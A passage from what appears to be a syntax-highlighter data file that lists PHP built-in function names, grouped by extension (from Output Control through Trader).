'openssl_x509_read'], 'Output Control': ['flush', 'ob_clean', 'ob_end_clean', 'ob_end_flush', 'ob_flush', 'ob_get_clean', 'ob_get_contents', 'ob_get_flush', 'ob_get_length', 'ob_get_level', 'ob_get_status', 'ob_gzhandler', 'ob_implicit_flush', 'ob_list_handlers', 'ob_start', 'output_add_rewrite_var', 'output_reset_rewrite_vars'], 'Ovrimos SQL': ['ovrimos_close', 'ovrimos_commit', 'ovrimos_connect', 'ovrimos_cursor', 'ovrimos_exec', 'ovrimos_execute', 'ovrimos_fetch_into', 'ovrimos_fetch_row', 'ovrimos_field_len', 'ovrimos_field_name', 'ovrimos_field_num', 'ovrimos_field_type', 'ovrimos_free_result', 'ovrimos_longreadlen', 'ovrimos_num_fields', 'ovrimos_num_rows', 'ovrimos_prepare', 'ovrimos_result_all', 'ovrimos_result', 'ovrimos_rollback'], 'PCNTL': ['pcntl_alarm', 'pcntl_errno', 'pcntl_exec', 'pcntl_fork', 'pcntl_get_last_error', 'pcntl_getpriority', 'pcntl_setpriority', 'pcntl_signal_dispatch', 'pcntl_signal', 'pcntl_sigprocmask', 'pcntl_sigtimedwait', 'pcntl_sigwaitinfo', 'pcntl_strerror', 'pcntl_wait', 'pcntl_waitpid', 'pcntl_wexitstatus', 'pcntl_wifexited', 'pcntl_wifsignaled', 'pcntl_wifstopped', 'pcntl_wstopsig', 'pcntl_wtermsig'], 'PCRE': ['preg_filter', 'preg_grep', 'preg_last_error', 'preg_match_all', 'preg_match', 'preg_quote', 'preg_replace_callback', 'preg_replace', 'preg_split'], 'PDF': ['PDF_activate_item', 'PDF_add_annotation', 'PDF_add_bookmark', 'PDF_add_launchlink', 'PDF_add_locallink', 'PDF_add_nameddest', 'PDF_add_note', 'PDF_add_outline', 'PDF_add_pdflink', 'PDF_add_table_cell', 'PDF_add_textflow', 'PDF_add_thumbnail', 'PDF_add_weblink', 'PDF_arc', 'PDF_arcn', 'PDF_attach_file', 'PDF_begin_document', 'PDF_begin_font', 'PDF_begin_glyph', 'PDF_begin_item', 'PDF_begin_layer', 'PDF_begin_page_ext', 'PDF_begin_page', 'PDF_begin_pattern', 'PDF_begin_template_ext', 'PDF_begin_template', 'PDF_circle', 'PDF_clip', 'PDF_close_image', 'PDF_close_pdi_page', 'PDF_close_pdi', 'PDF_close', 'PDF_closepath_fill_stroke', 'PDF_closepath_stroke', 'PDF_closepath', 'PDF_concat', 'PDF_continue_text', 'PDF_create_3dview', 'PDF_create_action', 'PDF_create_annotation', 'PDF_create_bookmark', 'PDF_create_field', 'PDF_create_fieldgroup', 'PDF_create_gstate', 'PDF_create_pvf', 'PDF_create_textflow', 'PDF_curveto', 'PDF_define_layer', 'PDF_delete_pvf', 'PDF_delete_table', 'PDF_delete_textflow', 'PDF_delete', 'PDF_encoding_set_char', 'PDF_end_document', 'PDF_end_font', 'PDF_end_glyph', 'PDF_end_item', 'PDF_end_layer', 'PDF_end_page_ext', 'PDF_end_page', 'PDF_end_pattern', 'PDF_end_template', 'PDF_endpath', 'PDF_fill_imageblock', 'PDF_fill_pdfblock', 'PDF_fill_stroke', 'PDF_fill_textblock', 'PDF_fill', 'PDF_findfont', 'PDF_fit_image', 'PDF_fit_pdi_page', 'PDF_fit_table', 'PDF_fit_textflow', 'PDF_fit_textline', 'PDF_get_apiname', 'PDF_get_buffer', 'PDF_get_errmsg', 'PDF_get_errnum', 'PDF_get_font', 'PDF_get_fontname', 'PDF_get_fontsize', 'PDF_get_image_height', 'PDF_get_image_width', 'PDF_get_majorversion', 'PDF_get_minorversion', 'PDF_get_parameter', 'PDF_get_pdi_parameter', 'PDF_get_pdi_value', 'PDF_get_value', 'PDF_info_font', 'PDF_info_matchbox', 'PDF_info_table', 'PDF_info_textflow', 'PDF_info_textline', 'PDF_initgraphics', 'PDF_lineto', 'PDF_load_3ddata', 'PDF_load_font', 'PDF_load_iccprofile', 'PDF_load_image', 'PDF_makespotcolor', 'PDF_moveto', 'PDF_new', 'PDF_open_ccitt', 'PDF_open_file', 'PDF_open_gif', 'PDF_open_image_file', 'PDF_open_image', 'PDF_open_jpeg', 'PDF_open_memory_image', 'PDF_open_pdi_document', 'PDF_open_pdi_page', 'PDF_open_pdi', 'PDF_open_tiff', 'PDF_pcos_get_number', 'PDF_pcos_get_stream', 'PDF_pcos_get_string', 'PDF_place_image', 'PDF_place_pdi_page', 'PDF_process_pdi', 'PDF_rect', 'PDF_restore', 'PDF_resume_page', 'PDF_rotate', 'PDF_save', 'PDF_scale', 'PDF_set_border_color', 'PDF_set_border_dash', 'PDF_set_border_style', 'PDF_set_char_spacing', 'PDF_set_duration', 'PDF_set_gstate', 'PDF_set_horiz_scaling', 'PDF_set_info_author', 'PDF_set_info_creator', 'PDF_set_info_keywords', 'PDF_set_info_subject', 'PDF_set_info_title', 'PDF_set_info', 'PDF_set_layer_dependency', 'PDF_set_leading', 'PDF_set_parameter', 'PDF_set_text_matrix', 'PDF_set_text_pos', 'PDF_set_text_rendering', 'PDF_set_text_rise', 'PDF_set_value', 'PDF_set_word_spacing', 'PDF_setcolor', 'PDF_setdash', 'PDF_setdashpattern', 'PDF_setflat', 'PDF_setfont', 'PDF_setgray_fill', 'PDF_setgray_stroke', 'PDF_setgray', 'PDF_setlinecap', 'PDF_setlinejoin', 'PDF_setlinewidth', 'PDF_setmatrix', 'PDF_setmiterlimit', 'PDF_setpolydash', 'PDF_setrgbcolor_fill', 'PDF_setrgbcolor_stroke', 'PDF_setrgbcolor', 'PDF_shading_pattern', 'PDF_shading', 'PDF_shfill', 'PDF_show_boxed', 'PDF_show_xy', 'PDF_show', 'PDF_skew', 'PDF_stringwidth', 'PDF_stroke', 'PDF_suspend_page', 'PDF_translate', 'PDF_utf16_to_utf8', 'PDF_utf32_to_utf16', 'PDF_utf8_to_utf16'], 'PHP Options/Info': ['assert_options', 'assert', 'cli_get_process_title', 'cli_set_process_title', 'dl', 'extension_loaded', 'gc_collect_cycles', 'gc_disable', 'gc_enable', 'gc_enabled', 'get_cfg_var', 'get_current_user', 'get_defined_constants', 'get_extension_funcs', 'get_include_path', 'get_included_files', 'get_loaded_extensions', 'get_magic_quotes_gpc', 'get_magic_quotes_runtime', 'get_required_files', 'getenv', 'getlastmod', 'getmygid', 'getmyinode', 'getmypid', 'getmyuid', 'getopt', 'getrusage', 'ini_alter', 'ini_get_all', 'ini_get', 'ini_restore', 'ini_set', 'magic_quotes_runtime', 'memory_get_peak_usage', 'memory_get_usage', 'php_ini_loaded_file', 'php_ini_scanned_files', 'php_logo_guid', 'php_sapi_name', 'php_uname', 'phpcredits', 'phpinfo', 'phpversion', 'putenv', 'restore_include_path', 'set_include_path', 'set_magic_quotes_runtime', 'set_time_limit', 'sys_get_temp_dir', 'version_compare', 'zend_logo_guid', 'zend_thread_id', 'zend_version'], 'POSIX': ['posix_access', 'posix_ctermid', 'posix_errno', 'posix_get_last_error', 'posix_getcwd', 'posix_getegid', 'posix_geteuid', 'posix_getgid', 'posix_getgrgid', 'posix_getgrnam', 'posix_getgroups', 'posix_getlogin', 'posix_getpgid', 'posix_getpgrp', 'posix_getpid', 'posix_getppid', 'posix_getpwnam', 'posix_getpwuid', 'posix_getrlimit', 'posix_getsid', 'posix_getuid', 'posix_initgroups', 'posix_isatty', 'posix_kill', 'posix_mkfifo', 'posix_mknod', 'posix_setegid', 'posix_seteuid', 'posix_setgid', 'posix_setpgid', 'posix_setsid', 'posix_setuid', 'posix_strerror', 'posix_times', 'posix_ttyname', 'posix_uname'], 'POSIX Regex': ['ereg_replace', 'ereg', 'eregi_replace', 'eregi', 'split', 'spliti', 'sql_regcase'], 'PS': ['ps_add_bookmark', 'ps_add_launchlink', 'ps_add_locallink', 'ps_add_note', 'ps_add_pdflink', 'ps_add_weblink', 'ps_arc', 'ps_arcn', 'ps_begin_page', 'ps_begin_pattern', 'ps_begin_template', 'ps_circle', 'ps_clip', 'ps_close_image', 'ps_close', 'ps_closepath_stroke', 'ps_closepath', 'ps_continue_text', 'ps_curveto', 'ps_delete', 'ps_end_page', 'ps_end_pattern', 'ps_end_template', 'ps_fill_stroke', 'ps_fill', 'ps_findfont', 'ps_get_buffer', 'ps_get_parameter', 'ps_get_value', 'ps_hyphenate', 'ps_include_file', 'ps_lineto', 'ps_makespotcolor', 'ps_moveto', 'ps_new', 'ps_open_file', 'ps_open_image_file', 'ps_open_image', 'ps_open_memory_image', 'ps_place_image', 'ps_rect', 'ps_restore', 'ps_rotate', 'ps_save', 'ps_scale', 'ps_set_border_color', 'ps_set_border_dash', 'ps_set_border_style', 'ps_set_info', 'ps_set_parameter', 'ps_set_text_pos', 'ps_set_value', 'ps_setcolor', 'ps_setdash', 'ps_setflat', 'ps_setfont', 'ps_setgray', 'ps_setlinecap', 'ps_setlinejoin', 'ps_setlinewidth', 'ps_setmiterlimit', 'ps_setoverprintmode', 'ps_setpolydash', 'ps_shading_pattern', 'ps_shading', 'ps_shfill', 'ps_show_boxed', 'ps_show_xy2', 'ps_show_xy', 'ps_show2', 'ps_show', 'ps_string_geometry', 'ps_stringwidth', 'ps_stroke', 'ps_symbol_name', 'ps_symbol_width', 'ps_symbol', 'ps_translate'], 'Paradox': ['px_close', 'px_create_fp', 'px_date2string', 'px_delete_record', 'px_delete', 'px_get_field', 'px_get_info', 'px_get_parameter', 'px_get_record', 'px_get_schema', 'px_get_value', 'px_insert_record', 'px_new', 'px_numfields', 'px_numrecords', 'px_open_fp', 'px_put_record', 'px_retrieve_record', 'px_set_blob_file', 'px_set_parameter', 'px_set_tablename', 'px_set_targetencoding', 'px_set_value', 'px_timestamp2string', 'px_update_record'], 'Parsekit': ['parsekit_compile_file', 'parsekit_compile_string', 'parsekit_func_arginfo'], 'Password Hashing': ['password_get_info', 'password_hash', 'password_needs_rehash', 'password_verify'], 'PostgreSQL': ['pg_affected_rows', 'pg_cancel_query', 'pg_client_encoding', 'pg_close', 'pg_connect', 'pg_connection_busy', 'pg_connection_reset', 'pg_connection_status', 'pg_convert', 'pg_copy_from', 'pg_copy_to', 'pg_dbname', 'pg_delete', 'pg_end_copy', 'pg_escape_bytea', 'pg_escape_identifier', 'pg_escape_literal', 'pg_escape_string', 'pg_execute', 'pg_fetch_all_columns', 'pg_fetch_all', 'pg_fetch_array', 'pg_fetch_assoc', 'pg_fetch_object', 'pg_fetch_result', 'pg_fetch_row', 'pg_field_is_null', 'pg_field_name', 'pg_field_num', 'pg_field_prtlen', 'pg_field_size', 'pg_field_table', 'pg_field_type_oid', 'pg_field_type', 'pg_free_result', 'pg_get_notify', 'pg_get_pid', 'pg_get_result', 'pg_host', 'pg_insert', 'pg_last_error', 'pg_last_notice', 'pg_last_oid', 'pg_lo_close', 'pg_lo_create', 'pg_lo_export', 'pg_lo_import', 'pg_lo_open', 'pg_lo_read_all', 'pg_lo_read', 'pg_lo_seek', 'pg_lo_tell', 'pg_lo_truncate', 'pg_lo_unlink', 'pg_lo_write', 'pg_meta_data', 'pg_num_fields', 'pg_num_rows', 'pg_options', 'pg_parameter_status', 'pg_pconnect', 'pg_ping', 'pg_port', 'pg_prepare', 'pg_put_line', 'pg_query_params', 'pg_query', 'pg_result_error_field', 'pg_result_error', 'pg_result_seek', 'pg_result_status', 'pg_select', 'pg_send_execute', 'pg_send_prepare', 'pg_send_query_params', 'pg_send_query', 'pg_set_client_encoding', 'pg_set_error_verbosity', 'pg_trace', 'pg_transaction_status', 'pg_tty', 'pg_unescape_bytea', 'pg_untrace', 'pg_update', 'pg_version'], 'Printer': ['printer_abort', 'printer_close', 'printer_create_brush', 'printer_create_dc', 'printer_create_font', 'printer_create_pen', 'printer_delete_brush', 'printer_delete_dc', 'printer_delete_font', 'printer_delete_pen', 'printer_draw_bmp', 'printer_draw_chord', 'printer_draw_elipse', 'printer_draw_line', 'printer_draw_pie', 'printer_draw_rectangle', 'printer_draw_roundrect', 'printer_draw_text', 'printer_end_doc', 'printer_end_page', 'printer_get_option', 'printer_list', 'printer_logical_fontheight', 'printer_open', 'printer_select_brush', 'printer_select_font', 'printer_select_pen', 'printer_set_option', 'printer_start_doc', 'printer_start_page', 'printer_write'], 'Proctitle': ['setproctitle', 'setthreadtitle'], 'Program execution': ['escapeshellarg', 'escapeshellcmd', 'exec', 'passthru', 'proc_close', 'proc_get_status', 'proc_nice', 'proc_open', 'proc_terminate', 'shell_exec', 'system'], 'Pspell': ['pspell_add_to_personal', 'pspell_add_to_session', 'pspell_check', 'pspell_clear_session', 'pspell_config_create', 'pspell_config_data_dir', 'pspell_config_dict_dir', 'pspell_config_ignore', 'pspell_config_mode', 'pspell_config_personal', 'pspell_config_repl', 'pspell_config_runtogether', 'pspell_config_save_repl', 'pspell_new_config', 'pspell_new_personal', 'pspell_new', 'pspell_save_wordlist', 'pspell_store_replacement', 'pspell_suggest'], 'RPM Reader': ['rpm_close', 'rpm_get_tag', 'rpm_is_valid', 'rpm_open', 'rpm_version'], 'RRD': ['rrd_create', 'rrd_error', 'rrd_fetch', 'rrd_first', 'rrd_graph', 'rrd_info', 'rrd_last', 'rrd_lastupdate', 'rrd_restore', 'rrd_tune', 'rrd_update', 'rrd_version', 'rrd_xport', 'rrdc_disconnect'], 'Radius': ['radius_acct_open', 'radius_add_server', 'radius_auth_open', 'radius_close', 'radius_config', 'radius_create_request', 'radius_cvt_addr', 'radius_cvt_int', 'radius_cvt_string', 'radius_demangle_mppe_key', 'radius_demangle', 'radius_get_attr', 'radius_get_tagged_attr_data', 'radius_get_tagged_attr_tag', 'radius_get_vendor_attr', 'radius_put_addr', 'radius_put_attr', 'radius_put_int', 'radius_put_string', 'radius_put_vendor_addr', 'radius_put_vendor_attr', 'radius_put_vendor_int', 'radius_put_vendor_string', 'radius_request_authenticator', 'radius_salt_encrypt_attr', 'radius_send_request', 'radius_server_secret', 'radius_strerror'], 'Rar': ['rar_wrapper_cache_stats'], 'Readline': ['readline_add_history', 'readline_callback_handler_install', 'readline_callback_handler_remove', 'readline_callback_read_char', 'readline_clear_history', 'readline_completion_function', 'readline_info', 'readline_list_history', 'readline_on_new_line', 'readline_read_history', 'readline_redisplay', 'readline_write_history', 'readline'], 'Recode': ['recode_file', 'recode_string', 'recode'], 'SNMP': ['snmp_get_quick_print', 'snmp_get_valueretrieval', 'snmp_read_mib', 'snmp_set_enum_print', 'snmp_set_oid_numeric_print', 'snmp_set_oid_output_format', 'snmp_set_quick_print', 'snmp_set_valueretrieval', 'snmp2_get', 'snmp2_getnext', 'snmp2_real_walk', 'snmp2_set', 'snmp2_walk', 'snmp3_get', 'snmp3_getnext', 'snmp3_real_walk', 'snmp3_set', 'snmp3_walk', 'snmpget', 'snmpgetnext', 'snmprealwalk', 'snmpset', 'snmpwalk', 'snmpwalkoid'], 'SOAP': ['is_soap_fault', 'use_soap_error_handler'], 'SPL': ['class_implements', 'class_parents', 'class_uses', 'iterator_apply', 'iterator_count', 'iterator_to_array', 'spl_autoload_call', 'spl_autoload_extensions', 'spl_autoload_functions', 'spl_autoload_register', 'spl_autoload_unregister', 'spl_autoload', 'spl_classes', 'spl_object_hash'], 'SPPLUS': ['calcul_hmac', 'calculhmac', 'nthmac', 'signeurlpaiement'], 'SQLSRV': ['sqlsrv_begin_transaction', 'sqlsrv_cancel', 'sqlsrv_client_info', 'sqlsrv_close', 'sqlsrv_commit', 'sqlsrv_configure', 'sqlsrv_connect', 'sqlsrv_errors', 'sqlsrv_execute', 'sqlsrv_fetch_array', 'sqlsrv_fetch_object', 'sqlsrv_fetch', 'sqlsrv_field_metadata', 'sqlsrv_free_stmt', 'sqlsrv_get_config', 'sqlsrv_get_field', 'sqlsrv_has_rows', 'sqlsrv_next_result', 'sqlsrv_num_fields', 'sqlsrv_num_rows', 'sqlsrv_prepare', 'sqlsrv_query', 'sqlsrv_rollback', 'sqlsrv_rows_affected', 'sqlsrv_send_stream_data', 'sqlsrv_server_info'], 'SQLite': ['sqlite_array_query', 'sqlite_busy_timeout', 'sqlite_changes', 'sqlite_close', 'sqlite_column', 'sqlite_create_aggregate', 'sqlite_create_function', 'sqlite_current', 'sqlite_error_string', 'sqlite_escape_string', 'sqlite_exec', 'sqlite_factory', 'sqlite_fetch_all', 'sqlite_fetch_array', 'sqlite_fetch_column_types', 'sqlite_fetch_object', 'sqlite_fetch_single', 'sqlite_fetch_string', 'sqlite_field_name', 'sqlite_has_more', 'sqlite_has_prev', 'sqlite_key', 'sqlite_last_error', 'sqlite_last_insert_rowid', 'sqlite_libencoding', 'sqlite_libversion', 'sqlite_next', 'sqlite_num_fields', 'sqlite_num_rows', 'sqlite_open', 'sqlite_popen', 'sqlite_prev', 'sqlite_query', 'sqlite_rewind', 'sqlite_seek', 'sqlite_single_query', 'sqlite_udf_decode_binary', 'sqlite_udf_encode_binary', 'sqlite_unbuffered_query', 'sqlite_valid'], 'SSH2': ['ssh2_auth_agent', 'ssh2_auth_hostbased_file', 'ssh2_auth_none', 'ssh2_auth_password', 'ssh2_auth_pubkey_file', 'ssh2_connect', 'ssh2_exec', 'ssh2_fetch_stream', 'ssh2_fingerprint', 'ssh2_methods_negotiated', 'ssh2_publickey_add', 'ssh2_publickey_init', 'ssh2_publickey_list', 'ssh2_publickey_remove', 'ssh2_scp_recv', 'ssh2_scp_send', 'ssh2_sftp_chmod', 'ssh2_sftp_lstat', 'ssh2_sftp_mkdir', 'ssh2_sftp_readlink', 'ssh2_sftp_realpath', 'ssh2_sftp_rename', 'ssh2_sftp_rmdir', 'ssh2_sftp_stat', 'ssh2_sftp_symlink', 'ssh2_sftp_unlink', 'ssh2_sftp', 'ssh2_shell', 'ssh2_tunnel'], 'SVN': ['svn_add', 'svn_auth_get_parameter', 'svn_auth_set_parameter', 'svn_blame', 'svn_cat', 'svn_checkout', 'svn_cleanup', 'svn_client_version', 'svn_commit', 'svn_delete', 'svn_diff', 'svn_export', 'svn_fs_abort_txn', 'svn_fs_apply_text', 'svn_fs_begin_txn2', 'svn_fs_change_node_prop', 'svn_fs_check_path', 'svn_fs_contents_changed', 'svn_fs_copy', 'svn_fs_delete', 'svn_fs_dir_entries', 'svn_fs_file_contents', 'svn_fs_file_length', 'svn_fs_is_dir', 'svn_fs_is_file', 'svn_fs_make_dir', 'svn_fs_make_file', 'svn_fs_node_created_rev', 'svn_fs_node_prop', 'svn_fs_props_changed', 'svn_fs_revision_prop', 'svn_fs_revision_root', 'svn_fs_txn_root', 'svn_fs_youngest_rev', 'svn_import', 'svn_log', 'svn_ls', 'svn_mkdir', 'svn_repos_create', 'svn_repos_fs_begin_txn_for_commit', 'svn_repos_fs_commit_txn', 'svn_repos_fs', 'svn_repos_hotcopy', 'svn_repos_open', 'svn_repos_recover', 'svn_revert', 'svn_status', 'svn_update'], 'SWF': ['swf_actiongeturl', 'swf_actiongotoframe', 'swf_actiongotolabel', 'swf_actionnextframe', 'swf_actionplay', 'swf_actionprevframe', 'swf_actionsettarget', 'swf_actionstop', 'swf_actiontogglequality', 'swf_actionwaitforframe', 'swf_addbuttonrecord', 'swf_addcolor', 'swf_closefile', 'swf_definebitmap', 'swf_definefont', 'swf_defineline', 'swf_definepoly', 'swf_definerect', 'swf_definetext', 'swf_endbutton', 'swf_enddoaction', 'swf_endshape', 'swf_endsymbol', 'swf_fontsize', 'swf_fontslant', 'swf_fonttracking', 'swf_getbitmapinfo', 'swf_getfontinfo', 'swf_getframe', 'swf_labelframe', 'swf_lookat', 'swf_modifyobject', 'swf_mulcolor', 'swf_nextid', 'swf_oncondition', 'swf_openfile', 'swf_ortho2', 'swf_ortho', 'swf_perspective', 'swf_placeobject', 'swf_polarview', 'swf_popmatrix', 'swf_posround', 'swf_pushmatrix', 'swf_removeobject', 'swf_rotate', 'swf_scale', 'swf_setfont', 'swf_setframe', 'swf_shapearc', 'swf_shapecurveto3', 'swf_shapecurveto', 'swf_shapefillbitmapclip', 'swf_shapefillbitmaptile', 'swf_shapefilloff', 'swf_shapefillsolid', 'swf_shapelinesolid', 'swf_shapelineto', 'swf_shapemoveto', 'swf_showframe', 'swf_startbutton', 'swf_startdoaction', 'swf_startshape', 'swf_startsymbol', 'swf_textwidth', 'swf_translate', 'swf_viewport'], 'Semaphore': ['ftok', 'msg_get_queue', 'msg_queue_exists', 'msg_receive', 'msg_remove_queue', 'msg_send', 'msg_set_queue', 'msg_stat_queue', 'sem_acquire', 'sem_get', 'sem_release', 'sem_remove', 'shm_attach', 'shm_detach', 'shm_get_var', 'shm_has_var', 'shm_put_var', 'shm_remove_var', 'shm_remove'], 'Session': ['session_cache_expire', 'session_cache_limiter', 'session_commit', 'session_decode', 'session_destroy', 'session_encode', 'session_get_cookie_params', 'session_id', 'session_is_registered', 'session_module_name', 'session_name', 'session_regenerate_id', 'session_register_shutdown', 'session_register', 'session_save_path', 'session_set_cookie_params', 'session_set_save_handler', 'session_start', 'session_status', 'session_unregister', 'session_unset', 'session_write_close'], 'Session PgSQL': ['session_pgsql_add_error', 'session_pgsql_get_error', 'session_pgsql_get_field', 'session_pgsql_reset', 'session_pgsql_set_field', 'session_pgsql_status'], 'Shared Memory': ['shmop_close', 'shmop_delete', 'shmop_open', 'shmop_read', 'shmop_size', 'shmop_write'], 'SimpleXML': ['simplexml_import_dom', 'simplexml_load_file', 'simplexml_load_string'], 'Socket': ['socket_accept', 'socket_bind', 'socket_clear_error', 'socket_close', 'socket_cmsg_space', 'socket_connect', 'socket_create_listen', 'socket_create_pair', 'socket_create', 'socket_get_option', 'socket_getpeername', 'socket_getsockname', 'socket_import_stream', 'socket_last_error', 'socket_listen', 'socket_read', 'socket_recv', 'socket_recvfrom', 'socket_recvmsg', 'socket_select', 'socket_send', 'socket_sendmsg', 'socket_sendto', 'socket_set_block', 'socket_set_nonblock', 'socket_set_option', 'socket_shutdown', 'socket_strerror', 'socket_write'], 'Solr': ['solr_get_version'], 'Statistic': ['stats_absolute_deviation', 'stats_cdf_beta', 'stats_cdf_binomial', 'stats_cdf_cauchy', 'stats_cdf_chisquare', 'stats_cdf_exponential', 'stats_cdf_f', 'stats_cdf_gamma', 'stats_cdf_laplace', 'stats_cdf_logistic', 'stats_cdf_negative_binomial', 'stats_cdf_noncentral_chisquare', 'stats_cdf_noncentral_f', 'stats_cdf_poisson', 'stats_cdf_t', 'stats_cdf_uniform', 'stats_cdf_weibull', 'stats_covariance', 'stats_den_uniform', 'stats_dens_beta', 'stats_dens_cauchy', 'stats_dens_chisquare', 'stats_dens_exponential', 'stats_dens_f', 'stats_dens_gamma', 'stats_dens_laplace', 'stats_dens_logistic', 'stats_dens_negative_binomial', 'stats_dens_normal', 'stats_dens_pmf_binomial', 'stats_dens_pmf_hypergeometric', 'stats_dens_pmf_poisson', 'stats_dens_t', 'stats_dens_weibull', 'stats_harmonic_mean', 'stats_kurtosis', 'stats_rand_gen_beta', 'stats_rand_gen_chisquare', 'stats_rand_gen_exponential', 'stats_rand_gen_f', 'stats_rand_gen_funiform', 'stats_rand_gen_gamma', 'stats_rand_gen_ibinomial_negative', 'stats_rand_gen_ibinomial', 'stats_rand_gen_int', 'stats_rand_gen_ipoisson', 'stats_rand_gen_iuniform', 'stats_rand_gen_noncenral_chisquare', 'stats_rand_gen_noncentral_f', 'stats_rand_gen_noncentral_t', 'stats_rand_gen_normal', 'stats_rand_gen_t', 'stats_rand_get_seeds', 'stats_rand_phrase_to_seeds', 'stats_rand_ranf', 'stats_rand_setall', 'stats_skew', 'stats_standard_deviation', 'stats_stat_binomial_coef', 'stats_stat_correlation', 'stats_stat_gennch', 'stats_stat_independent_t', 'stats_stat_innerproduct', 'stats_stat_noncentral_t', 'stats_stat_paired_t', 'stats_stat_percentile', 'stats_stat_powersum', 'stats_variance'], 'Stomp': ['stomp_connect_error', 'stomp_version'], 'Stream': ['set_socket_blocking', 'stream_bucket_append', 'stream_bucket_make_writeable', 'stream_bucket_new', 'stream_bucket_prepend', 'stream_context_create', 'stream_context_get_default', 'stream_context_get_options', 'stream_context_get_params', 'stream_context_set_default', 'stream_context_set_option', 'stream_context_set_params', 'stream_copy_to_stream', 'stream_encoding', 'stream_filter_append', 'stream_filter_prepend', 'stream_filter_register', 'stream_filter_remove', 'stream_get_contents', 'stream_get_filters', 'stream_get_line', 'stream_get_meta_data', 'stream_get_transports', 'stream_get_wrappers', 'stream_is_local', 'stream_notification_callback', 'stream_register_wrapper', 'stream_resolve_include_path', 'stream_select', 'stream_set_blocking', 'stream_set_chunk_size', 'stream_set_read_buffer', 'stream_set_timeout', 'stream_set_write_buffer', 'stream_socket_accept', 'stream_socket_client', 'stream_socket_enable_crypto', 'stream_socket_get_name', 'stream_socket_pair', 'stream_socket_recvfrom', 'stream_socket_sendto', 'stream_socket_server', 'stream_socket_shutdown', 'stream_supports_lock', 'stream_wrapper_register', 'stream_wrapper_restore', 'stream_wrapper_unregister'], 'String': ['addcslashes', 'addslashes', 'bin2hex', 'chop', 'chr', 'chunk_split', 'convert_cyr_string', 'convert_uudecode', 'convert_uuencode', 'count_chars', 'crc32', 'crypt', 'echo', 'explode', 'fprintf', 'get_html_translation_table', 'hebrev', 'hebrevc', 'hex2bin', 'html_entity_decode', 'htmlentities', 'htmlspecialchars_decode', 'htmlspecialchars', 'implode', 'join', 'lcfirst', 'levenshtein', 'localeconv', 'ltrim', 'md5_file', 'md5', 'metaphone', 'money_format', 'nl_langinfo', 'nl2br', 'number_format', 'ord', 'parse_str', 'print', 'printf', 'quoted_printable_decode', 'quoted_printable_encode', 'quotemeta', 'rtrim', 'setlocale', 'sha1_file', 'sha1', 'similar_text', 'soundex', 'sprintf', 'sscanf', 'str_getcsv', 'str_ireplace', 'str_pad', 'str_repeat', 'str_replace', 'str_rot13', 'str_shuffle', 'str_split', 'str_word_count', 'strcasecmp', 'strchr', 'strcmp', 'strcoll', 'strcspn', 'strip_tags', 'stripcslashes', 'stripos', 'stripslashes', 'stristr', 'strlen', 'strnatcasecmp', 'strnatcmp', 'strncasecmp', 'strncmp', 'strpbrk', 'strpos', 'strrchr', 'strrev', 'strripos', 'strrpos', 'strspn', 'strstr', 'strtok', 'strtolower', 'strtoupper', 'strtr', 'substr_compare', 'substr_count', 'substr_replace', 'substr', 'trim', 'ucfirst', 'ucwords', 'vfprintf', 'vprintf', 'vsprintf', 'wordwrap'], 'Sybase': ['sybase_affected_rows', 'sybase_close', 'sybase_connect', 'sybase_data_seek', 'sybase_deadlock_retry_count', 'sybase_fetch_array', 'sybase_fetch_assoc', 'sybase_fetch_field', 'sybase_fetch_object', 'sybase_fetch_row', 'sybase_field_seek', 'sybase_free_result', 'sybase_get_last_message', 'sybase_min_client_severity', 'sybase_min_error_severity', 'sybase_min_message_severity', 'sybase_min_server_severity', 'sybase_num_fields', 'sybase_num_rows', 'sybase_pconnect', 'sybase_query', 'sybase_result', 'sybase_select_db', 'sybase_set_message_handler', 'sybase_unbuffered_query'], 'TCP': ['tcpwrap_check'], 'Taint': ['is_tainted', 'taint', 'untaint'], 'Tidy': ['ob_tidyhandler', 'tidy_access_count', 'tidy_config_count', 'tidy_error_count', 'tidy_get_output', 'tidy_load_config', 'tidy_reset_config', 'tidy_save_config', 'tidy_set_encoding', 'tidy_setopt', 'tidy_warning_count'], 'Tokenizer': ['token_get_all', 'token_name'], 'Trader': ['trader_acos', 'trader_ad', 'trader_add', 'trader_adosc', 'trader_adx', 'trader_adxr', 'trader_apo', 'trader_aroon', 'trader_aroonosc', 'trader_asin', 'trader_atan', 'trader_atr', 'trader_avgprice', 'trader_bbands', 'trader_beta', 'trader_bop', 'trader_cci', 'trader_cdl2crows', 'trader_cdl3blackcrows', 'trader_cdl3inside', 'trader_cdl3linestrike', 'trader_cdl3outside', 'trader_cdl3starsinsouth', 'trader_cdl3whitesoldiers', 'trader_cdlabandonedbaby', 'trader_cdladvanceblock', 'trader_cdlbelthold', 'trader_cdlbreakaway', 'trader_cdlclosingmarubozu', 'trader_cdlconcealbabyswall', 'trader_cdlcounterattack', 'trader_cdldarkcloudcover', 'trader_cdldoji', 'trader_cdldojistar', 'trader_cdldragonflydoji', 'trader_cdlengulfing', 'trader_cdleveningdojistar', 'trader_cdleveningstar', 'trader_cdlgapsidesidewhite', 'trader_cdlgravestonedoji', 'trader_cdlhammer', 'trader_cdlhangingman', 'trader_cdlharami', 'trader_cdlharamicross', 'trader_cdlhighwave', 'trader_cdlhikkake', 'trader_cdlhikkakemod', 'trader_cdlhomingpigeon', 'trader_cdlidentical3crows', 'trader_cdlinneck', 'trader_cdlinvertedhammer', 'trader_cdlkicking', 'trader_cdlkickingbylength', 'trader_cdlladderbottom', 'trader_cdllongleggeddoji', 'trader_cdllongline', 'trader_cdlmarubozu', 'trader_cdlmatchinglow', 'trader_cdlmathold', 'trader_cdlmorningdojistar', 'trader_cdlmorningstar', 'trader_cdlonneck', 'trader_cdlpiercing', 'trader_cdlrickshawman', 'trader_cdlrisefall3methods', 'trader_cdlseparatinglines', 'trader_cdlshootingstar', 'trader_cdlshortline', 'trader_cdlspinningtop', 'trader_cdlstalledpattern', 'trader_cdlsticksandwich', 'trader_cdltakuri', 'trader_cdltasukigap', 'trader_cdlthrusting', 'trader_cdltristar', 'trader_cdlunique3river', 'trader_cdlupsidegap2crows', 'trader_cdlxsidegap3methods', 'trader_ceil', 'trader_cmo', 'trader_correl', 'trader_cos', 'trader_cosh', 'trader_dema', 'trader_div', 'trader_dx', 'trader_ema', 'trader_errno', 'trader_exp', 'trader_floor', 'trader_get_compat', 'trader_get_unstable_period', 'trader_ht_dcperiod', 'trader_ht_dcphase', 'trader_ht_phasor', 'trader_ht_sine', 'trader_ht_trendline', 'trader_ht_trendmode', 'trader_kama', 'trader_linearreg_angle', 'trader_linearreg_intercept', 'trader_linearreg_slope', 'trader_linearreg', 'trader_ln', 'trader_log10', 